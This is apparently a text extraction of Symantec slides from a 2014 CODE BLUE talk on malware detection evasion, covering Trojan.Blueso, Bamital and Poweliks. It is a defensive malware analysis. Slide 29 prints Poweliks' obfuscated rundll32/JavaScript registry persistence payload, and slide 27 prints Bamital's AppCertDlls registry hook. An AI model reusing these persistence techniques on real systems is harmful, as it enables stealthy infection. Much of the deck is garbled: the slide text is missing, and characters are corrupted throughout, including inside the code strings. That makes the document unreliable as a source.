code blue 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 hiroshi...
TRANSCRIPT
Copyright © 2014 Symantec Corpora6on 2
•
• • •
Copyright © 2014 Symantec Corpora6on 3
24 365
1
2
3
4
Copyright © 2014 Symantec Corpora6on 4
Trojan.Blueso
Copyright © 2014 Symantec Corpora6on 5
0
5,000
10,000
15,000
20,000
25,000
30,000
35,000
Trojan.Blueso
Trojan.Blueso
Copyright © 2014 Symantec Corpora6on 6
RAR MB
AutoIt
AutoIt Windows BASICWindows GUI
RARAutoIt
Inject Backdoor.Trojan
Copyright © 2014 Symantec Corpora6on 7
Windows
Internet Explorer
AutoIt
Copyright © 2014 Symantec Corpora6on 8
//
1
2
3
4
Copyright © 2014 Symantec Corpora6on 9
Copyright © 2014 Symantec Corpora6on 10
malicious
• •
Copyright © 2014 Symantec Corpora6on 11
Windows
AutoIt
Copyright © 2014 Symantec Corpora6on 12
Copyright © 2014 Symantec Corpora6on 13
AutoIt
•
•
• malicious
•
Copyright © 2014 Symantec Corpora6on 14
1
2
3
4
Copyright © 2014 Symantec Corpora6on 15
Copyright © 2014 Symantec Corpora6on 16
TAB
Copyright © 2014 Symantec Corpora6on 17
Copyright © 2014 Symantec Corpora6on 18
Copyright © 2014 Symantec Corpora6on 19
AutoIt 87486
900 1
Copyright © 2014 Symantec Corpora6on 20
•
•
ZIP
Jpeg
( )
Copyright © 2014 Symantec Corpora6on 21
1
2
3
4
Copyright © 2014 Symantec Corpora6on 22
Blueso
Copyright © 2014 Symantec Corpora6on 23
Windows
Internet Explorer
!!??
AutoIt
Copyright © 2014 Symantec Corpora6on 24
1) Internet Explorer -‐> malicious
2) -‐> AutoIT
3) AutoIt -‐> NtSetInforma6onProcess API AutoIT
Windows (essen6al)
AutoIt Windows
-‐>
Copyright © 2014 Symantec Corpora6on 25
1
2
3
4
Copyright © 2014 Symantec Corpora6on 26
Bamital
Copyright © 2014 Symantec Corpora6on 27
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Sefngs\Applica6on Data\Windows Server\xblscp.dll“
xblscp.dll malicious
malicious
Bamital(2)
Copyright © 2014 Symantec Corpora6on 28
• • •
Poweliks
Copyright © 2014 Symantec Corpora6on 29
Trojan.Poweliks Windows Powershell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-‐5D93-‐4B2E-‐BBB0-‐99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplica6on \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SuSve)(ILDS]]dmtje]]|84f81:v.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmzswfs43]]b(*,(=0tdsjqu?(*\".replace(/./g,func6on(_){return%20String.fromCharCode(_.charCodeAt()-‐1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
Copyright © 2014 Symantec Corpora6on 30
•
• •
•
& Q A
Copyright © 2014 Symantec Corpora6on 31
Thank you!
Copyright © 2014 Symantec CorporaMon. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corpora6on or its affiliates in the U.S. and other countries. Other names may be trademarks of their respec6ve owners.
This document is provided for informa6onal purposes only and is not intended as adver6sing. All warran6es rela6ng to the informa6on in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The informa6on in this document is subject to change without no6ce.